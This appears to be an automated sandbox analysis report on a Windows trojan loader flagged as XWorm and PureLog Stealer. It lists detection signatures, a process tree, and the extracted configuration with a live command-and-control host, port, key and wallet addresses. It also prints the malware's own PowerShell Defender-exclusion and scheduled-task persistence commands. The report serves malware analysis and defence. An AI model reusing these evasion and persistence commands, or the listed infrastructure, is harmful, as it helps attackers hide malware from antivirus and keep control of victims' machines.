Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe

Overview

General Information

Sample name:SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe
Analysis ID:1476041
MD5:dc674885e842e9c05644ce23f5d8b665
SHA1:82b33f0734fa62ddd93f1dfdc34285e8713b3e66
SHA256:ea098f4397146a44801177898a66a0da04690d51a242c5687b5e2d33afae1bfd
Tags:exe
Infos:

Detection

PureLog Stealer, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe (PID: 672 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe" MD5: DC674885E842E9C05644CE23F5D8B665)
    • powershell.exe (PID: 1372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2328 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • xNgpESfQOvfb.exe (PID: 7084 cmdline: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe MD5: DC674885E842E9C05644CE23F5D8B665)
    • schtasks.exe (PID: 2828 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • xNgpESfQOvfb.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe" MD5: DC674885E842E9C05644CE23F5D8B665)
    • xNgpESfQOvfb.exe (PID: 380 cmdline: "C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe" MD5: DC674885E842E9C05644CE23F5D8B665)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x88ab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8948:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8a5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x843d:$cnc4: POST / HTTP/1.1
    00000000.00000002.2209442377.0000000007060000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 11 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.7060000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                10.2.xNgpESfQOvfb.exe.2d51004.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    Click to see the 25 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ProcessId: 1372, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ProcessId: 1372, ProcessName: powershell.exe
                    Sigma detected: Startup Folder File Write
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessId: 5332, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, ParentImage: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe, ParentProcessId: 7084, ParentProcessName: xNgpESfQOvfb.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmp9832.tmp", ProcessId: 2828, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", ProcessId: 5196, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ProcessId: 1372, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ParentProcessId: 672, ParentProcessName: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp", ProcessId: 5196, ProcessName: schtasks.exe

                    Snort Signatures

                    Timestamp:07/18/24-16:29:27.355688
                    SID:2855924
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:32:34.193805
                    SID:2852874
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:31:23.445768
                    SID:2853193
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:33:12.637857
                    SID:2852923
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/18/24-16:33:12.636916
                    SID:2852870
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Suricata Signatures

                    Timestamp:2024-07-18T16:33:12.637857+0200
                    SID:2852923
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:31:23.445768+0200
                    SID:2853193
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:32:34.193805+0200
                    SID:2852874
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:29:27.355688+0200
                    SID:2855924
                    Source Port:49717
                    Destination Port:30608
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-18T16:33:12.636916+0200
                    SID:2852870
                    Source Port:30608
                    Destination Port:49717
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: moneymaker-30608.portmap.hostAvira URL Cloud: Label: phishing
                    Found malware configuration
                    Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\XClient.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeReversingLabs: Detection: 31%
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeReversingLabs: Detection: 31%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\XClient.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: moneymaker-30608.portmap.host
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: 30608
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: <123456789>
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: <Xwormmm>
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: XWorm V5.2
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: USB.exe
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: %AppData%
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: XClient.exe
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: bc1qz32y9es3p6hv6xs4kpqn4sqmrrr888qfyp67hm
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: 0xCe6C8E673e5d9aE4Ee7F357fE94b7EC06B52f3Fd
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpackString decryptor: TSoemRqDkQLR8bnFkw6tsBTUAaAyCujx5y
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49717 -> 193.161.193.99:30608
                    Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 193.161.193.99:30608 -> 192.168.2.6:49717
                    Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.6:49717 -> 193.161.193.99:30608
                    Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 193.161.193.99:30608 -> 192.168.2.6:49717
                    Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.6:49717 -> 193.161.193.99:30608
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: moneymaker-30608.portmap.host
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49717 -> 193.161.193.99:30608
                    Source: Joe Sandbox ViewIP Address: 193.161.193.99 193.161.193.99
                    Source: Joe Sandbox ViewASN Name: BITREE-ASRU BITREE-ASRU
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: moneymaker-30608.portmap.host
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, 00000009.00000002.4633950904.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, xNgpESfQOvfb.exe, 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 15.2.xNgpESfQOvfb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25c947c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25bf1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.25810d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 10.2.xNgpESfQOvfb.exe.2d99478.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 10.2.xNgpESfQOvfb.exe.2d51004.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 10.2.xNgpESfQOvfb.exe.2d8f19c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000F.00000002.2297610217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0000000A.00000002.2263227779.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000000.00000002.2200717075.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe, MilkSales.csLarge array initialization: : array initializer size 494327
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_00ADDA340_2_00ADDA34
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_056A06900_2_056A0690
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_056A06800_2_056A0680
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_07083B700_2_07083B70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_0708BB690_2_0708BB69
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_0708BB780_2_0708BB78
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_070839100_2_07083910
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071DB0480_2_071DB048
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D36100_2_071D3610
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D3A480_2_071D3A48
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D59B80_2_071D59B8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D31D80_2_071D31D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeCode function: 0_2_071D59C80_2_071D59C8
